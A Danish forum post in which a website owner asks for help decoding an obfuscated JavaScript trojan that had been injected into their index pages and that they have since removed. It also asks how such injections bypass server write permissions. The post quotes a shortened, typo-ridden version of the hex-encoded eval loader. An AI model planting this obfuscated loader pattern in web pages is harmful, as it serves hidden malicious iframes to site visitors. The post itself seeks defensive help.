Hjælp til dekodning af js:iframe.ac[trj] trojaneren
En trojaner har efterladt nedenstående kode på alle index.htm sider på mit websted og Avast råbte vagt i gevær så snart jeg med IE gik ind på siderne - Nu da Jeg har fjernet koden accepterer Avast de uden problemer.Koden er noget i stil med: <script>var t="";var arr="646f63756d656e742e777269746528273c{4 linier mere af slagsen}";for (i=0;i<arr.lenght;i+=2) t+=string.fromCharCode(parseint(arr[i]+arr[i+1],16));eval(t);</script>
Det er sikkert noget med at der i de 5 liniers hexadecimale kode er gemt en webadresse hvor trojaneren kan hente noget skadeligt indhold gemt i en iframe, eller noget i den stil. Spørgsmålet lyder: Findes der et miljø hvor jeg kan afvikle denne kode for at se hvad resultatet af algoritmen er, i klartekst!?
Med min ret begrænsede indsigt i javascript ser det ud som om at værdierne bliver hentet ud 2 karakterer ad gangen - men hvad 16 tallet så gør godt for kan Jeg ikke gennemskue.
Jeg giver gerne en masse points oven i for den der kan fortælle hvordan sådan en iframe trojaner kommer ind på webserververen og trodser skriverettigheder, credentials etc.